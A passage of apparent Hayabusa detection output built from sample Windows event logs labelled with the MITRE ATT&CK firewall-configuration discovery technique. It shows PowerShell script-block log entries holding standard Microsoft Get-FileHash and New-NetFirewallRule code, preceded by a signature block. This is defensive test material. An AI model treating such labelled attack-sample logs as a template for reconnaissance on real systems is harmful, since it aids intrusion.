iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQD # EyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAwODMx # MjIxOTMyWhcNMjAwODMxMjIyOTMyWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBD # QTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJyWVwZMGS/HZpgICBC # mXZTbD4b1m/My/Hqa/6XFhDg3zp0gxq3L6Ay7P/ewkJOI9VyANs1VwqJyq4gSfTw # aKxNS42lvXlLcZtHB9r9Jd+ddYjPqnNEf9eB2/O98jakyVxF3K+tPeAoaJcap6Vy # c1bxF5Tk/TWUcqDWdl8ed0WDhTgW0HNbBbpnUo2lsmkv2hkL/pJ0KeJ2L1TdFDBZ # +NKNYv3LyV9GMVC5JxPkQDDPcikQKCLHN049oDI9kM2hOAaFXE5WgigqBTK3S9dP # Y+fSLWLxRT3nrAgA9kahntFbjCZT6HqqSvJGzzc8OJ60d1ylF56NyxGPVjzBrAlf # A9MCAwEAAaOCAV4wggFaMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMsR6MrS # tBZYAck3LjMWFrlMmgofMAsGA1UdDwQEAwIBhjASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBT90TFO0yaKleGYYDuoMW+mPLzYLTAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTAfBgNVHSMEGDAWgBQOrIJgQFYnl+UlE/wq4QpTlVnk # pDBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtp # L2NybC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmwwVAYIKwYBBQUHAQEE # SDBGMEQGCCsGAQUFBzAChjhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY3Jvc29mdFJvb3RDZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAgEAWTk+ # fyZGr+tvQLEytWrrDi9uqEn361917Uw7LddDrQv+y+ktMaMjzHxQmIAhXaw9L0y6 # oqhWnONwu7i0+Hm1SXL3PupBf8rhDBdpy6WcIC36C1DEVs0t40rSvHDnqA2iA6VW # 4LiKS1fylUKc8fPv7uOGHzQ8uFaa8FMjhSqkghyT4pQHHfLiTviMocroE6WRTsgb # 0o9ylSpxbZsa+BzwU9ZnzCL/XB3Nooy9J7J5Y1ZEolHN+emjWFbdmwJFRC9f9Nqu # 1IIybvyklRPk62nnqaIsvsgrEA5ljpnb9aL6EiYJZTiU8XofSrvR4Vbo0HiWGFzJ # NRZf3ZMdSY4tvq00RBzuEBUaAF3dNVshzpjHCe6FDoxPbQ4TTj18KUicctHzbMrB # 7HCjV5JXfZSNoBtIA1r3z6NnCnSlNu0tLxfI5nI3EvRvsTxngvlSso0zFmUeDord # EN5k9G/ORtTTF+l5xAS00/ss3x+KnqwK+xMnQK3k+eGpf0a7B2BHZWBATrBC7E7t # s3Z52Ao0CW0cgDEf4g5U3eWh++VHEK1kmP9QFi58vwUheuKVQSdpw5OPlcmN2Jsh # rg1cnPCiroZogwxqLbt2awAdlq3yFnv2FoMkuYjPaqhHMS+a3ONxPdcAfmJH0c6I # ybgY+g5yjcGjPa8CQGr/aZuW4hCoELQ3UAjWwz0wggYHMIID76ADAgECAgphFmg0 # AAAAAAAcMA0GCSqGSIb3DQEBBQUAMF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAX # BgoJkiaJk/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jvc29mdCBSb290 # IENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0wNzA0MDMxMjUzMDlaFw0yMTA0MDMx # MzAzMDlaMHcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xITAf # BgNVBAMTGE1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQTCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAJ+hbLHf20iSKnxrLhnhveLjxZlRI1Ctzt0YTiQP7tGn # 0UytdDAgEesH1VSVFUmUG0KSrphcMCbaAGvoe73siQcP9w4EmPCJzB/LMySHnfL0 # Zxws/HvniB3q506jocEjU8qN+kXPCdBer9CwQgSi+aZsk2fXKNxGU7CG0OUoRi4n # rIZPVVIM5AMs+2qQkDBuh/NZMJ36ftaXs+ghl3740hPzCLdTbVK0RZCfSABKR2YR # JylmqJfk0waBSqL5hKcRRxQJgp+E7VV4/gGaHVAIhQAQMEbtt94jRrvELVSfrx54 # QTF3zJvfO4OToWECtR0Nsfz3m7IBziJLVP/5BcPCIAsCAwEAAaOCAaswggGnMA8G # A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFCM0+NlSRnAK7UD7dvuzK7DDNbMPMAsG # A1UdDwQEAwIBhjAQBgkrBgEEAYI3FQEEAwIBADCBmAYDVR0jBIGQMIGNgBQOrIJg # QFYnl+UlE/wq4QpTlVnkpKFjpGEwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcG # CgmSJomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWljcm9zb2Z0IFJvb3Qg # Q2VydGlmaWNhdGUgQXV0aG9yaXR5ghB5rRahSqClrUxzWPQHEy5lMFAGA1UdHwRJ # MEcwRaBDoEGGP2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1 # Y3RzL21pY3Jvc29mdHJvb3RjZXJ0LmNybDBUBggrBgEFBQcBAQRIMEYwRAYIKwYB # BQUHMAKGOGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljcm9z # b2Z0Um9vdENlcnQuY3J0MBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEB # BQUAA4ICAQAQl4rDXANENt3ptK132855UU0BsS50cVttDBOrzr57j7gu1BKijG1i # uFcCy04gE1CZ3XpA4le7r1iaHOEdAYasu3jyi9DsOwHu4r6PCgXIjUji8FMV3U+r # kuTnjWrVgMHmlPIGL4UD6ZEqJCJw+/b85HiZLg33B+JwvBhOnY5rCnKVuKE5nGct # xVEO6mJcPxaYiyA/4gcaMvnMMUp2MT0rcgvI6nA9/4UKE9/CCmGO8Ne4F+tOi3/F # NSteo7/rvH0LQnvUU3Ih7jDKu3hlXFsBFwoUDtLaFJj1PLlmWLMtL+f5hYbMUVbo # nXCUbKw5TNT2eb+qGHpiKe+imyk0BncaYsk9Hm0fgvALxyy7z0Oz5fnsfbXjpKh0 # NbhOxXEjEiZ2CzxSjHFaRkMUvLOzsE1nyJ9C/4B5IYCeFTBm6EISXhrIniIh0EPp # K+m79EjMLNTYMoBMJipIJF9a6lbvpt6Znco6b72BJ3QGEe52Ib+bgsEnVLaxaj2J # oXZhtG6hE6a/qkfwEm/9ijJssv7fUciMI8lmvZ0dhxJkAj0tr1mPuOQh5bWwymO0 # eFQF1EEuUKyUsKV4q7OglnUa2ZKHE3UiLzKoCG6gW4wlv6DvhMoh1useT8ma7kng # 9wFlb4kLfchpyOZu6qeXzjEp/w7FW1zYTRuh2Povnj8uVRZryROj/TGCBKcwggSj # AgEBMIGQMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xIzAh # BgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBAhMzAAAAsBGvCovQO5/d # AAEAAACwMAkGBSsOAwIaBQCggcAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYEFClk # UQl5qDpcmXxdpFeDJK8FifcsMGAGCisGAQQBgjcCAQwxUjBQoCaAJABXAGkAbgBk # AG8AdwBzACAAUABvAHcAZQByAFMAaABlAGwAbKEmgCRodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcG93ZXJzaGVsbCAwDQYJKoZIhvcNAQEBBQAEggEALlxQato88b0W # GuCgTkjSdxozipikRZRALhDIbPeqH6HtmgJcwK723FNOko6J0Xrhnt1w+Ypx77X2 # 8yP9Hu2sG+Cm+vH4RcLCKR9zAUQGmURsoNhCcRebCKchavCcPqYzL8WmMToUVuEB # epnqGcNr8gMvhur6+Tw22bJewK48IdD96JBDVEoihHj8d0jwM19UFPuT+EmebCRv # 8ii/hESmbCZnwQclRzaoA3oJ+odsWN+XbE3fHhrGSfnE7yaiMKsyHKQ+RsV9c1x9 # /XgOkPj1o/cfKgQ0qeOamP7HmABCWv9jGBaQ/lpLASraT6gaTl9yEPvuKx1ozorh # G1o2H651lKGCAigwggIkBgkqhkiG9w0BCQYxggIVMIICEQIBATCBjjB3MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEwHwYDVQQDExhNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0ECEzMAAAA1KO5hU5IiYZEAAAAAADUwCQYFKw4DAhoF # AKBdMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTEz # MTIxODAwMjI1OFowIwYJKoZIhvcNAQkEMRYEFKH1XT6678OZm4aTERf5dKwwQZed # MA0GCSqGSIb3DQEBBQUABIIBAGgc0v8jALuDbFhj0n+eoe+T+K3O7SCk9SDcc8wC # 9MP+HYeyr7IvyMJY9Prn1v/JEkUNBczhWmFluGBzw1ASpTkP5hJRbdZFiQkbtqR1 # PZi8TWsbcoWjbqzwR3fgiwydRlkDu0zKO+P3pbuHFgO2ACb7ggLRllTgfWNJFZGg # iHFwS0JLQttb18AZTZyt7VteGhzOrcfRP97+bPpidJXfR1eMXbeoXuAROO0LdNP1 # 6QcsS/++dFMLo+s7ISTcdh9OTKg672kD7zo2+UKZ/MvJbsOikD7cFJppM2ZDCnvi # S5HhTmzKz47z2m+/DsWq7NMZ1pfJFojTeMw8niuUPNOZWRg= # SIG # End signature block",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 